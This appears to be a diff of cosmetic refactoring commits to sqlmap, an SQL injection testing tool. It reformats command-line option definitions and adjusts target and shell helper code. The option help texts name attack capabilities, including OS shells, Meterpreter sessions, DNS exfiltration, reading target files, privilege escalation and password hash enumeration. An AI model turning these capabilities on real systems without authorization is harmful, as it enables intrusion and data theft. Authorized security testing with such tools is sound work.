ORACLE_SYSTEM_DBS = ("ANONYMOUS", "APEX_PUBLIC_USER", "CTXSYS", "DBSNMP", "DIP", "EXFSYS", "FLOWS_%", "FLOWS_FILES", "LBACSYS", "MDDATA", "MDSYS", "MGMT_VIEW", "OLAPSYS", "ORACLE_OCM", "ORDDATA", "ORDPLUGINS", "ORDSYS", "OUTLN", "OWBSYS", "SI_INFORMTN_SCHEMA", "SPATIAL_CSW_ADMIN_USR", "SPATIAL_WFS_ADMIN_USR", "SYS", "SYSMAN", "SYSTEM", "WKPROXY", "WKSYS", "WK_TEST", "WMSYS", "XDB", "XS$NULL") # Reference: https://blog.vishalgupta.com/2011/06/19/predefined-oracle-system-schemas/ ORACLE_SYSTEM_DBS = ("ANONYMOUS", "APEX_PUBLIC_USER", "CTXSYS", "DBSNMP", "DIP", "EXFSYS", "FLOWS_%", "FLOWS_FILES", "LBACSYS", "MDDATA", "MDSYS", "MGMT_VIEW", "OLAPSYS", "ORACLE_OCM", "ORDDATA", "ORDPLUGINS", "ORDSYS", "OUTLN", "OWBSYS", "SI_INFORMTN_SCHEMA", "SPATIAL_CSW_ADMIN_USR", "SPATIAL_WFS_ADMIN_USR", "SYS", "SYSMAN", "SYSTEM", "WKPROXY", "WKSYS", "WK_TEST", "WMSYS", "XDB", "XS$NULL") # Reference: https://blog.vishalgupta.com/2011/06/19/predefined-oracle-system-schemas/
SQLITE_SYSTEM_DBS = ("sqlite_master", "sqlite_temp_master") SQLITE_SYSTEM_DBS = ("sqlite_master", "sqlite_temp_master")
ACCESS_SYSTEM_DBS = ("MSysAccessObjects", "MSysACEs", "MSysObjects", "MSysQueries", "MSysRelationships", "MSysAccessStorage", "MSysAccessXML", "MSysModules", "MSysModules2") ACCESS_SYSTEM_DBS = ("MSysAccessObjects", "MSysACEs", "MSysObjects", "MSysQueries", "MSysRelationships", "MSysAccessStorage", "MSysAccessXML", "MSysModules", "MSysModules2")
FIREBIRD_SYSTEM_DBS = ("RDB$BACKUP_HISTORY", "RDB$CHARACTER_SETS", "RDB$CHECK_CONSTRAINTS", "RDB$COLLATIONS", "RDB$DATABASE", "RDB$DEPENDENCIES", "RDB$EXCEPTIONS", "RDB$FIELDS", "RDB$FIELD_DIMENSIONS", " RDB$FILES", "RDB$FILTERS", "RDB$FORMATS", "RDB$FUNCTIONS", "RDB$FUNCTION_ARGUMENTS", "RDB$GENERATORS", "RDB$INDEX_SEGMENTS", "RDB$INDICES", "RDB$LOG_FILES", "RDB$PAGES", "RDB$PROCEDURES", "RDB$PROCEDURE_PARAMETERS", "RDB$REF_CONSTRAINTS", "RDB$RELATIONS", "RDB$RELATION_CONSTRAINTS", "RDB$RELATION_FIELDS", "RDB$ROLES", "RDB$SECURITY_CLASSES", "RDB$TRANSACTIONS", "RDB$TRIGGERS", "RDB$TRIGGER_MESSAGES", "RDB$TYPES", "RDB$USER_PRIVILEGES", "RDB$VIEW_RELATIONS") FIREBIRD_SYSTEM_DBS = ("RDB$BACKUP_HISTORY", "RDB$CHARACTER_SETS", "RDB$CHECK_CONSTRAINTS", "RDB$COLLATIONS", "RDB$DATABASE", "RDB$DEPENDENCIES", "RDB$EXCEPTIONS", "RDB$FIELDS", "RDB$FIELD_DIMENSIONS", " RDB$FILES", "RDB$FILTERS", "RDB$FORMATS", "RDB$FUNCTIONS", "RDB$FUNCTION_ARGUMENTS", "RDB$GENERATORS", "RDB$INDEX_SEGMENTS", "RDB$INDICES", "RDB$LOG_FILES", "RDB$PAGES", "RDB$PROCEDURES", "RDB$PROCEDURE_PARAMETERS", "RDB$REF_CONSTRAINTS", "RDB$RELATIONS", "RDB$RELATION_CONSTRAINTS", "RDB$RELATION_FIELDS", "RDB$ROLES", "RDB$SECURITY_CLASSES", "RDB$TRANSACTIONS", "RDB$TRIGGERS", "RDB$TRIGGER_MESSAGES", "RDB$TYPES", "RDB$USER_PRIVILEGES", "RDB$VIEW_RELATIONS")

20
lib/core/shell.py
View File

@ -104,20 +104,20 @@ def autoCompletion(completion=None, os=None, commands=None):
if os == OS.WINDOWS: if os == OS.WINDOWS:
# Reference: http://en.wikipedia.org/wiki/List_of_DOS_commands # Reference: http://en.wikipedia.org/wiki/List_of_DOS_commands
completer = CompleterNG({ completer = CompleterNG({
"copy": None, "del": None, "dir": None, "copy": None, "del": None, "dir": None,
"echo": None, "md": None, "mem": None, "echo": None, "md": None, "mem": None,
"move": None, "net": None, "netstat -na": None, "move": None, "net": None, "netstat -na": None,
"ver": None, "xcopy": None, "whoami": None, "ver": None, "xcopy": None, "whoami": None,
}) })
else: else:
# Reference: http://en.wikipedia.org/wiki/List_of_Unix_commands # Reference: http://en.wikipedia.org/wiki/List_of_Unix_commands
completer = CompleterNG({ completer = CompleterNG({
"cp": None, "rm": None, "ls": None, "cp": None, "rm": None, "ls": None,
"echo": None, "mkdir": None, "free": None, "echo": None, "mkdir": None, "free": None,
"mv": None, "ifconfig": None, "netstat -natu": None, "mv": None, "ifconfig": None, "netstat -natu": None,
"pwd": None, "uname": None, "id": None, "pwd": None, "uname": None, "id": None,
}) })
readline.set_completer(completer.complete) readline.set_completer(completer.complete)
readline.parse_and_bind("tab: complete") readline.parse_and_bind("tab: complete")

6
lib/core/subprocessng.py
View File

@ -8,7 +8,6 @@ See the file 'LICENSE' for copying permission
import errno import errno
import os import os
import subprocess import subprocess
import sys
import time import time
from lib.core.settings import IS_WIN from lib.core.settings import IS_WIN
@ -24,11 +23,6 @@ else:
import select import select
import fcntl import fcntl
if (sys.hexversion >> 16) >= 0x202:
FCNTL = fcntl
else:
import FCNTL
def blockingReadFromFD(fd): def blockingReadFromFD(fd):
# Quick twist around original Twisted function # Quick twist around original Twisted function
# Blocking read from a non-blocking file descriptor # Blocking read from a non-blocking file descriptor

11
lib/core/target.py
View File

@ -232,7 +232,7 @@ def _setRequestParams():
kb.processUserMarks = True if (kb.postHint and kb.customInjectionMark in conf.data) else kb.processUserMarks kb.processUserMarks = True if (kb.postHint and kb.customInjectionMark in conf.data) else kb.processUserMarks
if re.search(URI_INJECTABLE_REGEX, conf.url, re.I) and not any(place in conf.parameters for place in (PLACE.GET, PLACE.POST)) and not kb.postHint and not kb.customInjectionMark in (conf.data or "") and conf.url.startswith("http"): if re.search(URI_INJECTABLE_REGEX, conf.url, re.I) and not any(place in conf.parameters for place in (PLACE.GET, PLACE.POST)) and not kb.postHint and kb.customInjectionMark not in (conf.data or "") and conf.url.startswith("http"):
warnMsg = "you've provided target URL without any GET " warnMsg = "you've provided target URL without any GET "
warnMsg += "parameters (e.g. 'http://www.site.com/article.php?id=1') " warnMsg += "parameters (e.g. 'http://www.site.com/article.php?id=1') "
warnMsg += "and without providing any POST parameters " warnMsg += "and without providing any POST parameters "
@ -377,7 +377,7 @@ def _setRequestParams():
if condition: if condition:
conf.parameters[PLACE.CUSTOM_HEADER] = str(conf.httpHeaders) conf.parameters[PLACE.CUSTOM_HEADER] = str(conf.httpHeaders)
conf.paramDict[PLACE.CUSTOM_HEADER] = {httpHeader: "%s,%s%s" % (httpHeader, headerValue, kb.customInjectionMark)} conf.paramDict[PLACE.CUSTOM_HEADER] = {httpHeader: "%s,%s%s" % (httpHeader, headerValue, kb.customInjectionMark)}
conf.httpHeaders = [(header, value.replace(kb.customInjectionMark, "")) for header, value in conf.httpHeaders] conf.httpHeaders = [(_[0], _[1].replace(kb.customInjectionMark, "")) for _ in conf.httpHeaders]
testableParameters = True testableParameters = True
if not conf.parameters: if not conf.parameters:
@ -391,7 +391,7 @@ def _setRequestParams():
raise SqlmapGenericException(errMsg) raise SqlmapGenericException(errMsg)
if conf.csrfToken: if conf.csrfToken:
if not any(conf.csrfToken in _ for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))) and not re.search(r"\b%s\b" % re.escape(conf.csrfToken), conf.data or "") and not conf.csrfToken in set(_[0].lower() for _ in conf.httpHeaders) and not conf.csrfToken in conf.paramDict.get(PLACE.COOKIE, {}): if not any(conf.csrfToken in _ for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))) and not re.search(r"\b%s\b" % re.escape(conf.csrfToken), conf.data or "") and conf.csrfToken not in set(_[0].lower() for _ in conf.httpHeaders) and conf.csrfToken not in conf.paramDict.get(PLACE.COOKIE, {}):
errMsg = "anti-CSRF token parameter '%s' not " % conf.csrfToken errMsg = "anti-CSRF token parameter '%s' not " % conf.csrfToken
errMsg += "found in provided GET, POST, Cookie or header values" errMsg += "found in provided GET, POST, Cookie or header values"
raise SqlmapGenericException(errMsg) raise SqlmapGenericException(errMsg)
@ -449,13 +449,10 @@ def _resumeHashDBValues():
conf.tmpPath = conf.tmpPath or hashDBRetrieve(HASHDB_KEYS.CONF_TMP_PATH) conf.tmpPath = conf.tmpPath or hashDBRetrieve(HASHDB_KEYS.CONF_TMP_PATH)
for injection in hashDBRetrieve(HASHDB_KEYS.KB_INJECTIONS, True) or []: for injection in hashDBRetrieve(HASHDB_KEYS.KB_INJECTIONS, True) or []:
if isinstance(injection, InjectionDict) and injection.place in conf.paramDict and \ if isinstance(injection, InjectionDict) and injection.place in conf.paramDict and injection.parameter in conf.paramDict[injection.place]:
injection.parameter in conf.paramDict[injection.place]:
if not conf.tech or intersect(conf.tech, injection.data.keys()): if not conf.tech or intersect(conf.tech, injection.data.keys()):
if intersect(conf.tech, injection.data.keys()): if intersect(conf.tech, injection.data.keys()):
injection.data = dict(_ for _ in injection.data.items() if _[0] in conf.tech) injection.data = dict(_ for _ in injection.data.items() if _[0] in conf.tech)
if injection not in kb.injections: if injection not in kb.injections:
kb.injections.append(injection) kb.injections.append(injection)

420
lib/parse/cmdline.py
View File

@ -50,9 +50,7 @@ def cmdLineParser(argv=None):
# Reference: https://stackoverflow.com/a/4012683 (Note: previously used "...sys.getfilesystemencoding() or UNICODE_ENCODING") # Reference: https://stackoverflow.com/a/4012683 (Note: previously used "...sys.getfilesystemencoding() or UNICODE_ENCODING")
_ = getUnicode(os.path.basename(argv[0]), encoding=sys.stdin.encoding) _ = getUnicode(os.path.basename(argv[0]), encoding=sys.stdin.encoding)
usage = "%s%s [options]" % ("python " if not IS_WIN else "", \ usage = "%s%s [options]" % ("python " if not IS_WIN else "", "\"%s\"" % _ if " " in _ else _)
"\"%s\"" % _ if " " in _ else _)
parser = OptionParser(usage=usage) parser = OptionParser(usage=usage)
try: try:
@ -115,15 +113,13 @@ def cmdLineParser(argv=None):
request.add_option("--load-cookies", dest="loadCookies", request.add_option("--load-cookies", dest="loadCookies",
help="File containing cookies in Netscape/wget format") help="File containing cookies in Netscape/wget format")
request.add_option("--drop-set-cookie", dest="dropSetCookie", request.add_option("--drop-set-cookie", dest="dropSetCookie", action="store_true",
action="store_true",
help="Ignore Set-Cookie header from response") help="Ignore Set-Cookie header from response")
request.add_option("--user-agent", dest="agent", request.add_option("--user-agent", dest="agent",
help="HTTP User-Agent header value") help="HTTP User-Agent header value")
request.add_option("--random-agent", dest="randomAgent", request.add_option("--random-agent", dest="randomAgent", action="store_true",
action="store_true",
help="Use randomly selected HTTP User-Agent header value") help="Use randomly selected HTTP User-Agent header value")
request.add_option("--host", dest="host", request.add_option("--host", dest="host",
@ -139,62 +135,55 @@ def cmdLineParser(argv=None):
help="Extra headers (e.g. \"Accept-Language: fr\\nETag: 123\")") help="Extra headers (e.g. \"Accept-Language: fr\\nETag: 123\")")
request.add_option("--auth-type", dest="authType", request.add_option("--auth-type", dest="authType",
help="HTTP authentication type " help="HTTP authentication type (Basic, Digest, NTLM or PKI)")
"(Basic, Digest, NTLM or PKI)")
request.add_option("--auth-cred", dest="authCred", request.add_option("--auth-cred", dest="authCred",
help="HTTP authentication credentials " help="HTTP authentication credentials (name:password)")
"(name:password)")
request.add_option("--auth-file", dest="authFile", request.add_option("--auth-file", dest="authFile",
help="HTTP authentication PEM cert/private key file") help="HTTP authentication PEM cert/private key file")
request.add_option("--ignore-code", dest="ignoreCode", type="int", request.add_option("--ignore-code", dest="ignoreCode", type="int",
help="Ignore HTTP error code (e.g. 401)") help="Ignore HTTP error code (e.g. 401)")
request.add_option("--ignore-proxy", dest="ignoreProxy", action="store_true", request.add_option("--ignore-proxy", dest="ignoreProxy", action="store_true",
help="Ignore system default proxy settings") help="Ignore system default proxy settings")
request.add_option("--ignore-redirects", dest="ignoreRedirects", action="store_true", request.add_option("--ignore-redirects", dest="ignoreRedirects", action="store_true",
help="Ignore redirection attempts") help="Ignore redirection attempts")
request.add_option("--ignore-timeouts", dest="ignoreTimeouts", action="store_true", request.add_option("--ignore-timeouts", dest="ignoreTimeouts", action="store_true",
help="Ignore connection timeouts") help="Ignore connection timeouts")
request.add_option("--proxy", dest="proxy", request.add_option("--proxy", dest="proxy",
help="Use a proxy to connect to the target URL") help="Use a proxy to connect to the target URL")
request.add_option("--proxy-cred", dest="proxyCred", request.add_option("--proxy-cred", dest="proxyCred",
help="Proxy authentication credentials " help="Proxy authentication credentials (name:password)")
"(name:password)")
request.add_option("--proxy-file", dest="proxyFile", request.add_option("--proxy-file", dest="proxyFile",
help="Load proxy list from a file") help="Load proxy list from a file")
request.add_option("--tor", dest="tor", request.add_option("--tor", dest="tor", action="store_true",
action="store_true", help="Use Tor anonymity network")
help="Use Tor anonymity network")
request.add_option("--tor-port", dest="torPort", request.add_option("--tor-port", dest="torPort",
help="Set Tor proxy port other than default") help="Set Tor proxy port other than default")
request.add_option("--tor-type", dest="torType", request.add_option("--tor-type", dest="torType",
help="Set Tor proxy type (HTTP, SOCKS4 or SOCKS5 (default))") help="Set Tor proxy type (HTTP, SOCKS4 or SOCKS5 (default))")
request.add_option("--check-tor", dest="checkTor", request.add_option("--check-tor", dest="checkTor", action="store_true",
action="store_true", help="Check to see if Tor is used properly")
help="Check to see if Tor is used properly")
request.add_option("--delay", dest="delay", type="float", request.add_option("--delay", dest="delay", type="float",
help="Delay in seconds between each HTTP request") help="Delay in seconds between each HTTP request")
request.add_option("--timeout", dest="timeout", type="float", request.add_option("--timeout", dest="timeout", type="float",
help="Seconds to wait before timeout connection " help="Seconds to wait before timeout connection (default %d)" % defaults.timeout)
"(default %d)" % defaults.timeout)
request.add_option("--retries", dest="retries", type="int", request.add_option("--retries", dest="retries", type="int",
help="Retries when the connection timeouts " help="Retries when the connection timeouts (default %d)" % defaults.retries)
"(default %d)" % defaults.retries)
request.add_option("--randomize", dest="rParam", request.add_option("--randomize", dest="rParam",
help="Randomly change value for given parameter(s)") help="Randomly change value for given parameter(s)")
@ -211,8 +200,7 @@ def cmdLineParser(argv=None):
request.add_option("--safe-freq", dest="safeFreq", type="int", request.add_option("--safe-freq", dest="safeFreq", type="int",
help="Test requests between two visits to a given safe URL") help="Test requests between two visits to a given safe URL")
request.add_option("--skip-urlencode", dest="skipUrlEncode", request.add_option("--skip-urlencode", dest="skipUrlEncode", action="store_true",
action="store_true",
help="Skip URL encoding of payload data") help="Skip URL encoding of payload data")
request.add_option("--csrf-token", dest="csrfToken", request.add_option("--csrf-token", dest="csrfToken",
@ -221,44 +209,36 @@ def cmdLineParser(argv=None):
request.add_option("--csrf-url", dest="csrfUrl", request.add_option("--csrf-url", dest="csrfUrl",
help="URL address to visit to extract anti-CSRF token") help="URL address to visit to extract anti-CSRF token")
request.add_option("--force-ssl", dest="forceSSL", request.add_option("--force-ssl", dest="forceSSL", action="store_true",
action="store_true",
help="Force usage of SSL/HTTPS") help="Force usage of SSL/HTTPS")
request.add_option("--hpp", dest="hpp", request.add_option("--hpp", dest="hpp", action="store_true",
action="store_true", help="Use HTTP parameter pollution method")
help="Use HTTP parameter pollution method")
request.add_option("--eval", dest="evalCode", request.add_option("--eval", dest="evalCode",
help="Evaluate provided Python code before the request (e.g. \"import hashlib;id2=hashlib.md5(id).hexdigest()\")") help="Evaluate provided Python code before the request (e.g. \"import hashlib;id2=hashlib.md5(id).hexdigest()\")")
# Optimization options # Optimization options
optimization = OptionGroup(parser, "Optimization", "These " optimization = OptionGroup(parser, "Optimization", "These options can be used to optimize the performance of sqlmap")
"options can be used to optimize the "
"performance of sqlmap")
optimization.add_option("-o", dest="optimize", optimization.add_option("-o", dest="optimize", action="store_true",
action="store_true", help="Turn on all optimization switches")
help="Turn on all optimization switches")
optimization.add_option("--predict-output", dest="predictOutput", action="store_true", optimization.add_option("--predict-output", dest="predictOutput", action="store_true",
help="Predict common queries output") help="Predict common queries output")
optimization.add_option("--keep-alive", dest="keepAlive", action="store_true", optimization.add_option("--keep-alive", dest="keepAlive", action="store_true",
help="Use persistent HTTP(s) connections") help="Use persistent HTTP(s) connections")
optimization.add_option("--null-connection", dest="nullConnection", action="store_true", optimization.add_option("--null-connection", dest="nullConnection", action="store_true",
help="Retrieve page length without actual HTTP response body") help="Retrieve page length without actual HTTP response body")
optimization.add_option("--threads", dest="threads", type="int", optimization.add_option("--threads", dest="threads", type="int",
help="Max number of concurrent HTTP(s) " help="Max number of concurrent HTTP(s) "
"requests (default %d)" % defaults.threads) "requests (default %d)" % defaults.threads)
# Injection options # Injection options
injection = OptionGroup(parser, "Injection", "These options can be " injection = OptionGroup(parser, "Injection", "These options can be used to specify which parameters to test for, provide custom injection payloads and optional tampering scripts")
"used to specify which parameters to test "
"for, provide custom injection payloads and "
"optional tampering scripts")
injection.add_option("-p", dest="testParameter", injection.add_option("-p", dest="testParameter",
help="Testable parameter(s)") help="Testable parameter(s)")
@ -270,36 +250,30 @@ def cmdLineParser(argv=None):
help="Skip testing parameters that not appear to be dynamic") help="Skip testing parameters that not appear to be dynamic")
injection.add_option("--param-exclude", dest="paramExclude", injection.add_option("--param-exclude", dest="paramExclude",
help="Regexp to exclude parameters from testing (e.g. \"ses\")") help="Regexp to exclude parameters from testing (e.g. \"ses\")")
injection.add_option("--dbms", dest="dbms", injection.add_option("--dbms", dest="dbms",
help="Force back-end DBMS to this value") help="Force back-end DBMS to this value")
injection.add_option("--dbms-cred", dest="dbmsCred", injection.add_option("--dbms-cred", dest="dbmsCred",
help="DBMS authentication credentials (user:password)") help="DBMS authentication credentials (user:password)")
injection.add_option("--os", dest="os", injection.add_option("--os", dest="os",
help="Force back-end DBMS operating system " help="Force back-end DBMS operating system to this value")
"to this value")
injection.add_option("--invalid-bignum", dest="invalidBignum", injection.add_option("--invalid-bignum", dest="invalidBignum", action="store_true",
action="store_true",
help="Use big numbers for invalidating values") help="Use big numbers for invalidating values")
injection.add_option("--invalid-logical", dest="invalidLogical", injection.add_option("--invalid-logical", dest="invalidLogical", action="store_true",
action="store_true",
help="Use logical operations for invalidating values") help="Use logical operations for invalidating values")
injection.add_option("--invalid-string", dest="invalidString", injection.add_option("--invalid-string", dest="invalidString", action="store_true",
action="store_true",
help="Use random strings for invalidating values") help="Use random strings for invalidating values")
injection.add_option("--no-cast", dest="noCast", injection.add_option("--no-cast", dest="noCast", action="store_true",
action="store_true",
help="Turn off payload casting mechanism") help="Turn off payload casting mechanism")
injection.add_option("--no-escape", dest="noEscape", injection.add_option("--no-escape", dest="noEscape", action="store_true",
action="store_true",
help="Turn off string escaping mechanism") help="Turn off string escaping mechanism")
injection.add_option("--prefix", dest="prefix", injection.add_option("--prefix", dest="prefix",
@ -312,54 +286,40 @@ def cmdLineParser(argv=None):
help="Use given script(s) for tampering injection data") help="Use given script(s) for tampering injection data")
# Detection options # Detection options
detection = OptionGroup(parser, "Detection", "These options can be " detection = OptionGroup(parser, "Detection", "These options can be used to customize the detection phase")
"used to customize the detection phase")
detection.add_option("--level", dest="level", type="int", detection.add_option("--level", dest="level", type="int",
help="Level of tests to perform (1-5, " help="Level of tests to perform (1-5, default %d)" % defaults.level)
"default %d)" % defaults.level)
detection.add_option("--risk", dest="risk", type="int", detection.add_option("--risk", dest="risk", type="int",
help="Risk of tests to perform (1-3, " help="Risk of tests to perform (1-3, default %d)" % defaults.risk)
"default %d)" % defaults.risk)
detection.add_option("--string", dest="string", detection.add_option("--string", dest="string",
help="String to match when " help="String to match when query is evaluated to True")
"query is evaluated to True")
detection.add_option("--not-string", dest="notString", detection.add_option("--not-string", dest="notString",
help="String to match when " help="String to match when query is evaluated to False")
"query is evaluated to False")
detection.add_option("--regexp", dest="regexp", detection.add_option("--regexp", dest="regexp",
help="Regexp to match when " help="Regexp to match when query is evaluated to True")
"query is evaluated to True")
detection.add_option("--code", dest="code", type="int", detection.add_option("--code", dest="code", type="int",
help="HTTP code to match when " help="HTTP code to match when query is evaluated to True")
"query is evaluated to True")
detection.add_option("--text-only", dest="textOnly", detection.add_option("--text-only", dest="textOnly", action="store_true",
action="store_true",
help="Compare pages based only on the textual content") help="Compare pages based only on the textual content")
detection.add_option("--titles", dest="titles", detection.add_option("--titles", dest="titles", action="store_true",
action="store_true",
help="Compare pages based only on their titles") help="Compare pages based only on their titles")
# Techniques options # Techniques options
techniques = OptionGroup(parser, "Techniques", "These options can be " techniques = OptionGroup(parser, "Techniques", "These options can be used to tweak testing of specific SQL injection techniques")
"used to tweak testing of specific SQL "
"injection techniques")
techniques.add_option("--technique", dest="tech", techniques.add_option("--technique", dest="tech",
help="SQL injection techniques to use " help="SQL injection techniques to use (default \"%s\")" % defaults.tech)
"(default \"%s\")" % defaults.tech)
techniques.add_option("--time-sec", dest="timeSec", techniques.add_option("--time-sec", dest="timeSec", type="int",
type="int", help="Seconds to delay the DBMS response (default %d)" % defaults.timeSec)
help="Seconds to delay the DBMS response "
"(default %d)" % defaults.timeSec)
techniques.add_option("--union-cols", dest="uCols", techniques.add_option("--union-cols", dest="uCols",
help="Range of columns to test for UNION query SQL injection") help="Range of columns to test for UNION query SQL injection")
@ -374,58 +334,45 @@ def cmdLineParser(argv=None):
help="Domain name used for DNS exfiltration attack") help="Domain name used for DNS exfiltration attack")
techniques.add_option("--second-order", dest="secondOrder", techniques.add_option("--second-order", dest="secondOrder",
help="Resulting page URL searched for second-order " help="Resulting page URL searched for second-order response")
"response")
# Fingerprint options # Fingerprint options
fingerprint = OptionGroup(parser, "Fingerprint") fingerprint = OptionGroup(parser, "Fingerprint")
fingerprint.add_option("-f", "--fingerprint", dest="extensiveFp", fingerprint.add_option("-f", "--fingerprint", dest="extensiveFp", action="store_true",
action="store_true",
help="Perform an extensive DBMS version fingerprint") help="Perform an extensive DBMS version fingerprint")
# Enumeration options # Enumeration options
enumeration = OptionGroup(parser, "Enumeration", "These options can " enumeration = OptionGroup(parser, "Enumeration", "These options can be used to enumerate the back-end database management system information, structure and data contained in the tables. Moreover you can run your own SQL statements")
"be used to enumerate the back-end database "
"management system information, structure "
"and data contained in the tables. Moreover "
"you can run your own SQL statements")
enumeration.add_option("-a", "--all", dest="getAll", enumeration.add_option("-a", "--all", dest="getAll", action="store_true",
action="store_true", help="Retrieve everything") help="Retrieve everything")
enumeration.add_option("-b", "--banner", dest="getBanner", enumeration.add_option("-b", "--banner", dest="getBanner", action="store_true",
action="store_true", help="Retrieve DBMS banner") help="Retrieve DBMS banner")
enumeration.add_option("--current-user", dest="getCurrentUser", enumeration.add_option("--current-user", dest="getCurrentUser", action="store_true",
action="store_true",
help="Retrieve DBMS current user") help="Retrieve DBMS current user")
enumeration.add_option("--current-db", dest="getCurrentDb", enumeration.add_option("--current-db", dest="getCurrentDb", action="store_true",
action="store_true",
help="Retrieve DBMS current database") help="Retrieve DBMS current database")
enumeration.add_option("--hostname", dest="getHostname", enumeration.add_option("--hostname", dest="getHostname", action="store_true",
action="store_true",
help="Retrieve DBMS server hostname") help="Retrieve DBMS server hostname")
enumeration.add_option("--is-dba", dest="isDba", enumeration.add_option("--is-dba", dest="isDba", action="store_true",
action="store_true",
help="Detect if the DBMS current user is DBA") help="Detect if the DBMS current user is DBA")
enumeration.add_option("--users", dest="getUsers", action="store_true", enumeration.add_option("--users", dest="getUsers", action="store_true",
help="Enumerate DBMS users") help="Enumerate DBMS users")
enumeration.add_option("--passwords", dest="getPasswordHashes", enumeration.add_option("--passwords", dest="getPasswordHashes", action="store_true",
action="store_true",
help="Enumerate DBMS users password hashes") help="Enumerate DBMS users password hashes")
enumeration.add_option("--privileges", dest="getPrivileges", enumeration.add_option("--privileges", dest="getPrivileges", action="store_true",
action="store_true",
help="Enumerate DBMS users privileges") help="Enumerate DBMS users privileges")
enumeration.add_option("--roles", dest="getRoles", enumeration.add_option("--roles", dest="getRoles", action="store_true",
action="store_true",
help="Enumerate DBMS users roles") help="Enumerate DBMS users roles")
enumeration.add_option("--dbs", dest="getDbs", action="store_true", enumeration.add_option("--dbs", dest="getDbs", action="store_true",
@ -470,10 +417,8 @@ def cmdLineParser(argv=None):
enumeration.add_option("-U", dest="user", enumeration.add_option("-U", dest="user",
help="DBMS user to enumerate") help="DBMS user to enumerate")
enumeration.add_option("--exclude-sysdbs", dest="excludeSysDbs", enumeration.add_option("--exclude-sysdbs", dest="excludeSysDbs", action="store_true",
action="store_true", help="Exclude DBMS system databases when enumerating tables")
help="Exclude DBMS system databases when "
"enumerating tables")
enumeration.add_option("--pivot-column", dest="pivotColumn", enumeration.add_option("--pivot-column", dest="pivotColumn",
help="Pivot column name") help="Pivot column name")
@ -496,28 +441,23 @@ def cmdLineParser(argv=None):
enumeration.add_option("--sql-query", dest="query", enumeration.add_option("--sql-query", dest="query",
help="SQL statement to be executed") help="SQL statement to be executed")
enumeration.add_option("--sql-shell", dest="sqlShell", enumeration.add_option("--sql-shell", dest="sqlShell", action="store_true",
action="store_true",
help="Prompt for an interactive SQL shell") help="Prompt for an interactive SQL shell")
enumeration.add_option("--sql-file", dest="sqlFile", enumeration.add_option("--sql-file", dest="sqlFile",
help="Execute SQL statements from given file(s)") help="Execute SQL statements from given file(s)")
# Brute force options # Brute force options
brute = OptionGroup(parser, "Brute force", "These " brute = OptionGroup(parser, "Brute force", "These options can be used to run brute force checks")
"options can be used to run brute force "
"checks")
brute.add_option("--common-tables", dest="commonTables", action="store_true", brute.add_option("--common-tables", dest="commonTables", action="store_true",
help="Check existence of common tables") help="Check existence of common tables")
brute.add_option("--common-columns", dest="commonColumns", action="store_true", brute.add_option("--common-columns", dest="commonColumns", action="store_true",
help="Check existence of common columns") help="Check existence of common columns")
# User-defined function options # User-defined function options
udf = OptionGroup(parser, "User-defined function injection", "These " udf = OptionGroup(parser, "User-defined function injection", "These options can be used to create custom user-defined functions")
"options can be used to create custom user-defined "
"functions")
udf.add_option("--udf-inject", dest="udfInject", action="store_true", udf.add_option("--udf-inject", dest="udfInject", action="store_true",
help="Inject custom user-defined functions") help="Inject custom user-defined functions")
@ -526,167 +466,131 @@ def cmdLineParser(argv=None):
help="Local path of the shared library") help="Local path of the shared library")
# File system options # File system options
filesystem = OptionGroup(parser, "File system access", "These options " filesystem = OptionGroup(parser, "File system access", "These options can be used to access the back-end database management system underlying file system")
"can be used to access the back-end database "
"management system underlying file system")
filesystem.add_option("--file-read", dest="rFile", filesystem.add_option("--file-read", dest="rFile",
help="Read a file from the back-end DBMS " help="Read a file from the back-end DBMS file system")
"file system")
filesystem.add_option("--file-write", dest="wFile", filesystem.add_option("--file-write", dest="wFile",
help="Write a local file on the back-end " help="Write a local file on the back-end DBMS file system")
"DBMS file system")
filesystem.add_option("--file-dest", dest="dFile", filesystem.add_option("--file-dest", dest="dFile",
help="Back-end DBMS absolute filepath to " help="Back-end DBMS absolute filepath to write to")
"write to")
# Takeover options # Takeover options
takeover = OptionGroup(parser, "Operating system access", "These " takeover = OptionGroup(parser, "Operating system access", "These options can be used to access the back-end database management system underlying operating system")
"options can be used to access the back-end "
"database management system underlying "
"operating system")
takeover.add_option("--os-cmd", dest="osCmd", takeover.add_option("--os-cmd", dest="osCmd",
help="Execute an operating system command") help="Execute an operating system command")
takeover.add_option("--os-shell", dest="osShell", takeover.add_option("--os-shell", dest="osShell", action="store_true",
action="store_true", help="Prompt for an interactive operating system shell")
help="Prompt for an interactive operating "
"system shell")
takeover.add_option("--os-pwn", dest="osPwn", takeover.add_option("--os-pwn", dest="osPwn", action="store_true",
action="store_true", help="Prompt for an OOB shell, Meterpreter or VNC")
help="Prompt for an OOB shell, "
"Meterpreter or VNC")
takeover.add_option("--os-smbrelay", dest="osSmb", takeover.add_option("--os-smbrelay", dest="osSmb", action="store_true",
action="store_true", help="One click prompt for an OOB shell, Meterpreter or VNC")
help="One click prompt for an OOB shell, "
"Meterpreter or VNC")
takeover.add_option("--os-bof", dest="osBof", takeover.add_option("--os-bof", dest="osBof", action="store_true",
action="store_true",
help="Stored procedure buffer overflow " help="Stored procedure buffer overflow "
"exploitation") "exploitation")
takeover.add_option("--priv-esc", dest="privEsc", takeover.add_option("--priv-esc", dest="privEsc", action="store_true",
action="store_true",
help="Database process user privilege escalation") help="Database process user privilege escalation")
takeover.add_option("--msf-path", dest="msfPath", takeover.add_option("--msf-path", dest="msfPath",
help="Local path where Metasploit Framework " help="Local path where Metasploit Framework is installed")
"is installed")
takeover.add_option("--tmp-path", dest="tmpPath", takeover.add_option("--tmp-path", dest="tmpPath",
help="Remote absolute path of temporary files " help="Remote absolute path of temporary files directory")
"directory")
# Windows registry options # Windows registry options
windows = OptionGroup(parser, "Windows registry access", "These " windows = OptionGroup(parser, "Windows registry access", "These options can be used to access the back-end database management system Windows registry")
"options can be used to access the back-end "
"database management system Windows "
"registry")
windows.add_option("--reg-read", dest="regRead", windows.add_option("--reg-read", dest="regRead", action="store_true",
action="store_true", help="Read a Windows registry key value")
help="Read a Windows registry key value")
windows.add_option("--reg-add", dest="regAdd", windows.add_option("--reg-add", dest="regAdd", action="store_true",
action="store_true", help="Write a Windows registry key value data")
help="Write a Windows registry key value data")
windows.add_option("--reg-del", dest="regDel", windows.add_option("--reg-del", dest="regDel", action="store_true",
action="store_true", help="Delete a Windows registry key value")
help="Delete a Windows registry key value")
